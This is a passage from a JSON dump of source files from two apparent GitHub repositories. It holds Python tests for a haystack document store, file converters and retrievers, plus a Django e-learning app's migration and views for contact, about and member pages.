"text": "import numpy as np\nimport pytest\nfrom elasticsearch import Elasticsearch\n\nfrom haystack.database.base import Document, Label\nfrom haystack.database.elasticsearch import ElasticsearchDocumentStore\nfrom haystack.database.faiss import FAISSDocumentStore\n\n\ndef test_get_all_documents_without_filters(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents()\n assert all(isinstance(d, Document) for d in documents)\n assert len(documents) == 3\n assert {d.meta[\"name\"] for d in documents} == {\"filename1\", \"filename2\", \"filename3\"}\n assert {d.meta[\"meta_field\"] for d in documents} == {\"test1\", \"test2\", \"test3\"}\n\n\ndef test_get_all_documents_with_correct_filters(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents(filters={\"meta_field\": [\"test2\"]})\n assert len(documents) == 1\n assert documents[0].meta[\"name\"] == \"filename2\"\n\n documents = document_store_with_docs.get_all_documents(filters={\"meta_field\": [\"test1\", \"test3\"]})\n assert len(documents) == 2\n assert {d.meta[\"name\"] for d in documents} == {\"filename1\", \"filename3\"}\n assert {d.meta[\"meta_field\"] for d in documents} == {\"test1\", \"test3\"}\n\n\ndef test_get_all_documents_with_incorrect_filter_name(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents(filters={\"incorrect_meta_field\": [\"test2\"]})\n assert len(documents) == 0\n\n\ndef test_get_all_documents_with_incorrect_filter_value(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents(filters={\"meta_field\": [\"incorrect_value\"]})\n assert len(documents) == 0\n\n\ndef test_get_documents_by_id(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents()\n doc = document_store_with_docs.get_document_by_id(documents[0].id)\n assert doc.id == documents[0].id\n assert doc.text == documents[0].text\n\n\ndef test_write_document_meta(document_store):\n documents = [\n {\"text\": \"dict_without_meta\", \"id\": \"1\"},\n {\"text\": \"dict_with_meta\", \"meta_field\": \"test2\", \"name\": \"filename2\", \"id\": \"2\"},\n Document(text=\"document_object_without_meta\", id=\"3\"),\n Document(text=\"document_object_with_meta\", meta={\"meta_field\": \"test4\", \"name\": \"filename3\"}, id=\"4\"),\n ]\n document_store.write_documents(documents)\n documents_in_store = document_store.get_all_documents()\n assert len(documents_in_store) == 4\n\n assert not document_store.get_document_by_id(\"1\").meta\n assert document_store.get_document_by_id(\"2\").meta[\"meta_field\"] == \"test2\"\n assert not document_store.get_document_by_id(\"3\").meta\n assert document_store.get_document_by_id(\"4\").meta[\"meta_field\"] == \"test4\"\n\n\ndef test_write_document_index(document_store):\n documents = [\n {\"text\": \"text1\", \"id\": \"1\"},\n {\"text\": \"text2\", \"id\": \"2\"},\n ]\n document_store.write_documents([documents[0]], index=\"haystack_test_1\")\n assert len(document_store.get_all_documents(index=\"haystack_test_1\")) == 1\n\n if not isinstance(document_store, FAISSDocumentStore): # addition of more documents is not supported in FAISS\n document_store.write_documents([documents[1]], index=\"haystack_test_2\")\n assert len(document_store.get_all_documents(index=\"haystack_test_2\")) == 1\n\n assert len(document_store.get_all_documents(index=\"haystack_test_1\")) == 1\n assert len(document_store.get_all_documents()) == 0\n\n\ndef test_labels(document_store):\n label = Label(\n 
question=\"question\",\n answer=\"answer\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=12,\n no_answer=False,\n origin=\"gold_label\",\n )\n document_store.write_labels([label], index=\"haystack_test_label\")\n labels = document_store.get_all_labels(index=\"haystack_test_label\")\n assert len(labels) == 1\n\n labels = document_store.get_all_labels()\n assert len(labels) == 0\n\n\ndef test_multilabel(document_store):\n labels =[\n Label(\n question=\"question\",\n answer=\"answer1\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=12,\n no_answer=False,\n origin=\"gold_label\",\n ),\n # different answer in same doc\n Label(\n question=\"question\",\n answer=\"answer2\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=42,\n no_answer=False,\n origin=\"gold_label\",\n ),\n # answer in different doc\n Label(\n question=\"question\",\n answer=\"answer3\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"321\",\n offset_start_in_doc=7,\n no_answer=False,\n origin=\"gold_label\",\n ),\n # 'no answer', should be excluded from MultiLabel\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"777\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n # is_correct_answer=False, should be excluded from MultiLabel\n Label(\n question=\"question\",\n answer=\"answer5\",\n is_correct_answer=False,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=99,\n no_answer=True,\n origin=\"gold_label\",\n ),\n ]\n document_store.write_labels(labels, index=\"haystack_test_multilabel\")\n multi_labels = document_store.get_all_labels_aggregated(index=\"haystack_test_multilabel\")\n labels = document_store.get_all_labels(index=\"haystack_test_multilabel\")\n\n assert len(multi_labels) == 1\n assert len(labels) == 5\n\n assert len(multi_labels[0].multiple_answers) == 3\n assert len(multi_labels[0].multiple_answers) \\\n == len(multi_labels[0].multiple_document_ids) \\\n == len(multi_labels[0].multiple_offset_start_in_docs)\n\n multi_labels = document_store.get_all_labels_aggregated()\n assert len(multi_labels) == 0\n\n # clean up\n document_store.delete_all_documents(index=\"haystack_test_multilabel\")\n\n\ndef test_multilabel_no_answer(document_store):\n labels = [\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"777\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n # no answer in different doc\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n # no answer in same doc, should be excluded\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"777\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n # no answer with is_correct_answer=False, should be excluded\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=False,\n is_correct_document=True,\n document_id=\"321\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n ]\n\n document_store.write_labels(labels, index=\"haystack_test_multilabel_no_answer\")\n multi_labels = 
document_store.get_all_labels_aggregated(index=\"haystack_test_multilabel_no_answer\")\n labels = document_store.get_all_labels(index=\"haystack_test_multilabel_no_answer\")\n\n assert len(multi_labels) == 1\n assert len(labels) == 4\n\n assert len(multi_labels[0].multiple_document_ids) == 2\n assert len(multi_labels[0].multiple_answers) \\\n == len(multi_labels[0].multiple_document_ids) \\\n == len(multi_labels[0].multiple_offset_start_in_docs)\n\n # clean up\n document_store.delete_all_documents(index=\"haystack_test_multilabel_no_answer\")\n\n\[email protected](\"document_store_with_docs\", [\"elasticsearch\"], indirect=True)\ndef test_elasticsearch_update_meta(document_store_with_docs):\n document = document_store_with_docs.query(query=None, filters={\"name\": [\"filename1\"]})[0]\n document_store_with_docs.update_document_meta(document.id, meta={\"meta_field\": \"updated_meta\"})\n updated_document = document_store_with_docs.query(query=None, filters={\"name\": [\"filename1\"]})[0]\n assert updated_document.meta[\"meta_field\"] == \"updated_meta\"\n\n\ndef test_elasticsearch_custom_fields(elasticsearch_fixture):\n client = Elasticsearch()\n client.indices.delete(index='haystack_test_custom', ignore=[404])\n document_store = ElasticsearchDocumentStore(index=\"haystack_test_custom\", text_field=\"custom_text_field\",\n embedding_field=\"custom_embedding_field\")\n\n doc_to_write = {\"custom_text_field\": \"test\", \"custom_embedding_field\": np.random.rand(768).astype(np.float32)}\n document_store.write_documents([doc_to_write])\n documents = document_store.get_all_documents()\n assert len(documents) == 1\n assert documents[0].text == \"test\"\n np.testing.assert_array_equal(doc_to_write[\"custom_embedding_field\"], documents[0].embedding)\n"
},
{
"alpha_fraction": 0.7052954435348511,
"alphanum_fraction": 0.7187260389328003,
"avg_line_length": 45.55356979370117,
"blob_id": "2bf440311600df02e45c3df5f37a7289719ac6dd",
"content_id": "2436ba2f287aeb7a4e52a8d60d64be30d27b1f7d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2606,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 56,
"path": "/test/test_pdf_conversion.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from pathlib import Path\n\nimport pytest\n\nfrom haystack.indexing.file_converters.pdf import PDFToTextConverter\nfrom haystack.indexing.file_converters.tika import TikaConverter\n\n\[email protected](\"Converter\", [PDFToTextConverter, TikaConverter])\ndef test_extract_pages(Converter, xpdf_fixture):\n converter = Converter()\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\"))\n assert len(pages) == 4 # the sample PDF file has four pages.\n assert pages[0] != \"\" # the page 1 of PDF contains text.\n assert pages[2] == \"\" # the page 3 of PDF file is empty.\n\n\[email protected](\"Converter\", [PDFToTextConverter, TikaConverter])\ndef test_table_removal(Converter, xpdf_fixture):\n converter = Converter(remove_numeric_tables=True)\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\"))\n\n # assert numeric rows are removed from the table.\n assert \"324\" not in pages[0]\n assert \"54x growth\" not in pages[0]\n\n # assert text is retained from the document.\n assert \"Adobe Systems made the PDF specification available free of charge in 1993.\" in pages[0].replace(\"\\n\", \"\")\n\n\[email protected](\"Converter\", [PDFToTextConverter, TikaConverter])\ndef test_language_validation(Converter, xpdf_fixture, caplog):\n converter = Converter(valid_languages=[\"en\"])\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\"))\n assert \"The language for samples/pdf/sample_pdf_1.pdf is not one of ['en'].\" not in caplog.text\n\n converter = Converter(valid_languages=[\"de\"])\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\"))\n assert \"The language for samples/pdf/sample_pdf_1.pdf is not one of ['de'].\" in caplog.text\n\n\[email protected](\"Converter\", [PDFToTextConverter, TikaConverter])\ndef test_header_footer_removal(Converter, xpdf_fixture):\n converter = Converter(remove_header_footer=True)\n converter_no_removal = Converter(remove_header_footer=False)\n\n pages1, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\")) # file contains no header/footer\n pages2, _ = converter_no_removal.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\")) # file contains no header/footer\n for p1, p2 in zip(pages1, pages2):\n assert p2 == p2\n\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_2.pdf\")) # file contains header and footer\n assert len(pages) == 4\n for page in pages:\n assert \"This is a header.\" not in page\n assert \"footer\" not in page"
},
{
"alpha_fraction": 0.6859459280967712,
"alphanum_fraction": 0.6983783841133118,
"avg_line_length": 51.85714340209961,
"blob_id": "03922637fc775980fb7800760fd8463b9eb6ba47",
"content_id": "6089a095480d0ba40127815463929619d7671f35",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1850,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 35,
"path": "/test/test_elastic_retriever.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from haystack.retriever.sparse import ElasticsearchRetriever\nimport pytest\n\n\[email protected](\"document_store_with_docs\", [(\"elasticsearch\")], indirect=True)\ndef test_elasticsearch_retrieval(document_store_with_docs):\n retriever = ElasticsearchRetriever(document_store=document_store_with_docs)\n res = retriever.retrieve(query=\"Who lives in Berlin?\")\n assert res[0].text == \"My name is Carla and I live in Berlin\"\n assert len(res) == 3\n assert res[0].meta[\"name\"] == \"filename1\"\n\[email protected](\"document_store_with_docs\", [(\"elasticsearch\")], indirect=True)\ndef test_elasticsearch_retrieval_filters(document_store_with_docs):\n retriever = ElasticsearchRetriever(document_store=document_store_with_docs)\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\": [\"filename1\"]})\n assert res[0].text == \"My name is Carla and I live in Berlin\"\n assert len(res) == 1\n assert res[0].meta[\"name\"] == \"filename1\"\n\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\":[\"filename1\"], \"meta_field\": [\"not_existing_value\"]})\n assert len(res) == 0\n\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\":[\"filename1\"], \"not_existing_field\": [\"not_existing_value\"]})\n assert len(res) == 0\n\n retriever = ElasticsearchRetriever(document_store=document_store_with_docs)\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\":[\"filename1\"], \"meta_field\": [\"test1\",\"test2\"]})\n assert res[0].text == \"My name is Carla and I live in Berlin\"\n assert len(res) == 1\n assert res[0].meta[\"name\"] == \"filename1\"\n\n retriever = ElasticsearchRetriever(document_store=document_store_with_docs)\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\":[\"filename1\"], \"meta_field\":[\"test2\"]})\n assert len(res) == 0\n"
},
{
"alpha_fraction": 0.7489539980888367,
"alphanum_fraction": 0.7552301287651062,
"avg_line_length": 46.79999923706055,
"blob_id": "a26d3b47cc427b88a861f30db4d662876c14c543",
"content_id": "6d570c373824ad749c7cc4dca0833cb121f316ec",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "permissive",
"max_line_length": 162,
"num_lines": 10,
"path": "/test/test_docx_conversion.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from pathlib import Path\n\nfrom haystack.indexing.file_converters.docx import DocxToTextConverter\n\n\ndef test_extract_pages():\n converter = DocxToTextConverter()\n paragraphs, _ = converter.extract_pages(file_path=Path(\"samples/docx/sample_docx.docx\"))\n assert len(paragraphs) == 8 # Sample has 8 Paragraphs\n assert paragraphs[1] == 'The US has \"passed the peak\" on new coronavirus cases, President Donald Trump said and predicted that some states would reopen this month.'\n"
},
{
"alpha_fraction": 0.6381322741508484,
"alphanum_fraction": 0.661478579044342,
"avg_line_length": 39.578948974609375,
"blob_id": "27d6faafb4178fe1425a2976f2bd11d07bfd79b9",
"content_id": "c8b6c6fe1c7d27281830361575a60ed496e897d0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 771,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 19,
"path": "/test/test_tfidf_retriever.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "def test_tfidf_retriever():\n from haystack.retriever.sparse import TfidfRetriever\n\n test_docs = [\n {\"id\": \"26f84672c6d7aaeb8e2cd53e9c62d62d\", \"name\": \"testing the finder 1\", \"text\": \"godzilla says hello\"},\n {\"name\": \"testing the finder 2\", \"text\": \"optimus prime says bye\"},\n {\"name\": \"testing the finder 3\", \"text\": \"alien says arghh\"}\n ]\n\n from haystack.database.memory import InMemoryDocumentStore\n document_store = InMemoryDocumentStore()\n document_store.write_documents(test_docs)\n\n retriever = TfidfRetriever(document_store)\n retriever.fit()\n doc = retriever.retrieve(\"godzilla\", top_k=1)[0]\n assert doc.id == \"26f84672c6d7aaeb8e2cd53e9c62d62d\"\n assert doc.text == 'godzilla says hello'\n assert doc.meta == {\"name\": \"testing the finder 1\"}\n"
}
] | 24 |
laniludwick/melon-inventory-accounting | https://github.com/laniludwick/melon-inventory-accounting | 7f05399e934d2d4cb0ba5d2289e13dfd6f2f6186 | b397cedfbfa080b9303d85717ff2ec76a457dd9e | a492d6a9572e86a04a7087de1bb2a46c0667c543 | refs/heads/master | 2022-11-16T16:03:52.700675 | 2020-07-14T16:33:22 | 2020-07-14T16:33:22 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6879562139511108,
"alphanum_fraction": 0.6879562139511108,
"avg_line_length": 26.450000762939453,
"blob_id": "16bacd431085c3f7c0c74150b51790836e7fb9d4",
"content_id": "c2292dbfcafe5d5c7cf97d65c8b59f2303c37da7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 548,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 20,
"path": "/melon_info.py",
"repo_name": "laniludwick/melon-inventory-accounting",
"src_encoding": "UTF-8",
"text": "\"\"\"Print out all the melons in our inventory.\"\"\"\n\n\nfrom melons import melons #This call imports the dictionary in melons.py\n\n\ndef print_melons(melons):\n \"\"\"Print each melon with corresponding attribute information.\"\"\"\n\n for melon_name, melon_attributes in melons.items():\n\n print(\"\")\n print(f'{melon_name.upper()}') #Prints melon name\n\n for melon_attribute, melon_value in melon_attributes.items():\n\n print(f'{melon_attribute}: {melon_value}') #Prints melon attributes\n\n\nprint_melons(melons) #Call the function"
},
{
"alpha_fraction": 0.47339946031570435,
"alphanum_fraction": 0.49774572253227234,
"avg_line_length": 24.227272033691406,
"blob_id": "f53f5703ce35ac7b2bb67c58b5e1212aab0f8377",
"content_id": "f74cdefd51deb0533bc5ba88c0ef14a1024821d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1109,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 44,
"path": "/melons.py",
"repo_name": "laniludwick/melon-inventory-accounting",
"src_encoding": "UTF-8",
"text": "melons = {\n \n 'Honeydew' : {\n 'melon_price': 0.99,\n 'melon_seedlessness': 'Do not have',\n 'melon_flesh_color': 'Light pink',\n 'melon_rind_color': 'Light green',\n 'melon_average_weight': None,\n\n },\n\n 'Crenshaw' : {\n 'melon_price': 2.00,\n 'melon_seedlessness': 'Have',\n 'melon_flesh_color': 'Medium pink',\n 'melon_rind_color': 'Dark green',\n 'melon_average_weight': 1.47, \n },\n\n 'Crane' : {\n 'melon_price': 2.50,\n 'melon_seedlessness': 'Have',\n 'melon_flesh_color': 'Deep pink',\n 'melon_rind_color': 'Light green',\n 'melon_average_weight': 1.48, \n },\n\n 'Casaba' : {\n 'melon_price': 2.50,\n 'melon_seedlessness': 'Have',\n 'melon_flesh_color': 'Reddish',\n 'melon_rind_color': 'Dark green',\n 'melon_average_weight': 1.49, \n },\n\n 'Cantaloupe' : {\n 'melon_price': 0.99,\n 'melon_seedlessness': 'Have',\n 'melon_flesh_color': 'Orange',\n 'melon_rind_color': 'Beige',\n 'melon_average_weight': 1.50, \n }, \n\n}"
}
] | 2 |
LJYue/Set_affinity_for_Perform_3d | https://github.com/LJYue/Set_affinity_for_Perform_3d | 185f9a6477f863aab5595e87efedcaa7f8f0f0cc | 88e6c52727043f6d9c307a4ab8f855ad14741084 | ac364716b578c15d823601369af8e5c37e6a7eca | refs/heads/master | 2020-05-26T22:23:12.900413 | 2017-02-22T05:59:15 | 2017-02-22T05:59:15 | 82,510,156 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7732518911361694,
"alphanum_fraction": 0.787508487701416,
"avg_line_length": 104.21428680419922,
"blob_id": "99251e7dbe0d8bf6a6c88bd7f34e32725dadec82",
"content_id": "b32f9ba509aecef2c867cf800c9beda0aaada8a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1473,
"license_type": "no_license",
"max_line_length": 808,
"num_lines": 14,
"path": "/README.md",
"repo_name": "LJYue/Set_affinity_for_Perform_3d",
"src_encoding": "UTF-8",
"text": "# Readme\n## Link\nhttps://github.com/LJYue/Set_affinity_for_Perform_3d\n## Notice\nThis .py file set affinity to all threads for ALL PERFORM-3D engines every 20 minutes. This can be easily changed by modifying the file using any text editors, for instance, notepad.\n\nIt works only for 64 bit program; 32 bit is supported in thoeary. \n\n## Background\nPERFORM-3D would atomatically set affinity for all of its engines, which can be of benefit, but the program can only detect cores of the CPU instead of threads. Let me illustrate better. \n\nIf, for instance, the CPU has 2 cores (and 4 threads), the engines would be assgined to only two threads namely CPU0 and CPU2, leaving CPU1 and CPU3 idle. Since there are four threads, the computer can support four engines running in full capacity. One may want to set affinity for engines to all threads (CPU0, CPU1, CPU2 and CPU3 in this case) manually, so that the computer can run four engines simultaneously without jamming each other in only two of the four threads. But notice that an engine process is created for one load case only, after the completion of that load case, another engine process is created to run the folloiwing load case. Unfortunately, its affinity is automatically set to CPU0 and CPU2 by default. Now one would have to manually set affinity once again to reach full capacity! \n\nBeing fed up with, one turns to python and leaves such cumbersomeness to computer. Ha, isn't it what computers are created for?\n"
},
{
"alpha_fraction": 0.489393949508667,
"alphanum_fraction": 0.5015151500701904,
"avg_line_length": 26.54166603088379,
"blob_id": "cc19230fe16051d1c038e6d7b383d12388898e39",
"content_id": "21d734fe19e41caaf02ddd27f82b3e16612f901b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 24,
"path": "/run.py",
"repo_name": "LJYue/Set_affinity_for_Perform_3d",
"src_encoding": "UTF-8",
"text": "import sched\nimport time\nimport psutil\n\ndef main():\n s = sched.scheduler(time.time, time.sleep)\n def set_affinity(sc): \n all_id = psutil.pids()\n for i in all_id:\n p = psutil.Process(i)\n if \"Pf3dEngine\" in p.name()or \"Perform-3D\" in p.name():\n # print p.pid\n # break\n p.cpu_affinity([])\n p.nice(psutil.HIGH_PRIORITY_CLASS)\n print str(p.pid)+\" set\"\n print time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n s.enter(600, 1, set_affinity, (s,))\n\n s.enter(1, 1, set_affinity, (s,))\n s.run()\n\nif __name__ == \"__main__\":\n main()"
}
] | 2 |
Shehab-Magdy/Ayrid_E-Learn-master | https://github.com/Shehab-Magdy/Ayrid_E-Learn-master | 6a747662d6aad9f6fd6634463efdbc55493a61f6 | 7dc6aac71b2026e8829d1e8b0540f6b1ae09e197 | 0cd765f3f433d00d6385640f732b57e818cd531f | refs/heads/master | 2022-04-15T17:32:28.517940 | 2020-04-11T21:50:19 | 2020-04-11T21:50:19 | 254,961,075 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.530393123626709,
"alphanum_fraction": 0.5413231253623962,
"avg_line_length": 45.5625,
"blob_id": "79e629c3b4375b0fcd57ddbdfcdf999476da43e1",
"content_id": "a6ea9b8cbcd1333729d7ac56e4bf235a2aef7c44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5215,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 112,
"path": "/eLearn/migrations/0001_initial.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.6 on 2019-12-28 11:06\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='ContactUS',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('firstName', models.CharField(max_length=60)),\n ('lastName', models.CharField(max_length=60)),\n ('email', models.EmailField(max_length=254)),\n ('message', models.TextField(null=True)),\n ('replyStatus', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='Events',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=60)),\n ('startDate', models.DateTimeField(blank=True, null=True)),\n ('endDate', models.DateTimeField(blank=True, null=True)),\n ('location', models.CharField(max_length=60)),\n ('contactPhone', models.CharField(max_length=60)),\n ('description', models.TextField(null=True)),\n ('pic', models.FileField(upload_to='uploads/events/%Y/%m/%d/')),\n ('eventStatus', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='HaederSlider',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=60)),\n ('pic', models.FileField(upload_to='uploads/slider/%Y/%m/%d/')),\n ],\n ),\n migrations.CreateModel(\n name='Members',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('FullName', models.CharField(max_length=60)),\n ('description', models.TextField(null=True)),\n ('pic', models.FileField(upload_to='uploads/membersPhoto/%Y/%m/%d/')),\n ('status', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='ourTeam',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('FullName', models.CharField(max_length=60)),\n ('description', models.TextField(null=True)),\n ('JobTitle', models.CharField(max_length=60)),\n ('pic', models.FileField(upload_to='uploads/ourTeam/%Y/%m/%d/')),\n ('status', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='Registration',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('email', models.EmailField(max_length=254)),\n ('password', models.CharField(max_length=60)),\n ('phoneNumber', models.CharField(max_length=30)),\n ('fullName', models.CharField(max_length=60)),\n ('birthDate', models.DateField(blank=True, null=True)),\n ('status', models.BooleanField(default=True)),\n ('activeUser', models.BooleanField(default=0)),\n ('Profilephoto', models.FileField(upload_to='uploads/regPhotos/%Y/%m/%d/')),\n ('creationDate', models.DateField(auto_now_add=True)),\n ('lastModifiedDate', models.DateField(auto_now=True)),\n ],\n ),\n migrations.CreateModel(\n name='SiteSubscribers',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('email', models.EmailField(max_length=254)),\n ('status', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='SystemSettings',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('key', models.CharField(max_length=200)),\n 
('value', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='EventDetails',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=60)),\n ('startTime', models.DateTimeField(blank=True, null=True)),\n ('endTime', models.DateTimeField(blank=True, null=True)),\n ('pic', models.FileField(upload_to='uploads/events/%Y/%m/%d/')),\n ('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eLearn.Events')),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.81144779920578,
"alphanum_fraction": 0.8215488195419312,
"avg_line_length": 36.125,
"blob_id": "24e524263e97c6ebf57e026c4e959b02cfc0bc27",
"content_id": "5b40b4cbfe8a255066ce51f46047b6437f50cf7c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 297,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 8,
"path": "/eLearn/views/about_us.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\ndef about(request):\n return render(request,'about_us/about.html')\n"
},
{
"alpha_fraction": 0.6871846914291382,
"alphanum_fraction": 0.6922300457954407,
"avg_line_length": 44.04545593261719,
"blob_id": "dfab0807c473e5f3f11d3aa67b275ff301bc0fcc",
"content_id": "090ca10d61dc5492619964ea241ee529417094c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 991,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 22,
"path": "/eLearn/views/contact_us.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.mail import send_mail\nfrom django.urls import reverse\nfrom django.views.generic import View\nfrom eLearn.models import Registration, HaederSlider\nfrom eLearn.forms import ContactUsForm\n\ndef contactUs(request):\n if request.method == 'POST':\n form = ContactUsForm(request.POST)\n if form.is_valid():\n #send email code goes here\n sender_name = form.cleaned_data['firstName']\n sender_email = form.cleaned_data['email']\n message = \"{0} has sent you a message:\\n\\n{1}\".format(sender_name,form.cleaned_data['message'])\n send_mail('New enquiry',message, sender_email,['[email protected]'])\n return HttpResponse('Thanks for contacting us! ;)')\n else:\n form = ContactUsForm()\n return render(request,'contact_us/contactus.html', {'form': form})\n"
},
{
"alpha_fraction": 0.6881473064422607,
"alphanum_fraction": 0.6915995478630066,
"avg_line_length": 36.739131927490234,
"blob_id": "ad309847119c4fa9a3be54de14d8d852bdcf2330",
"content_id": "809a9fcd38e9261c58ae784fcd8a45b350c531cb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 869,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 23,
"path": "/eLearn/views/members.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Members\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef editMembers(request):\n if request.method == 'POST':\n newMember = Members()\n newMember.FullName = request.POST.get('FullName')\n newMember.description = request.POST.get('description')\n newMember.status = True if request.POST.get('active') else False\n newMember.pic = request.FILES['memberImg']\n newMember.save()\n return render(request, 'admin/adminhome.html')\n elif request.method == 'GET':\n pass\n if Members.objects.all():\n members = Members.objects.all()\n else:\n members=[]\n return render(request, 'admin/adminrotator/members.html', {'members':members})\n\n"
},
{
"alpha_fraction": 0.7396449446678162,
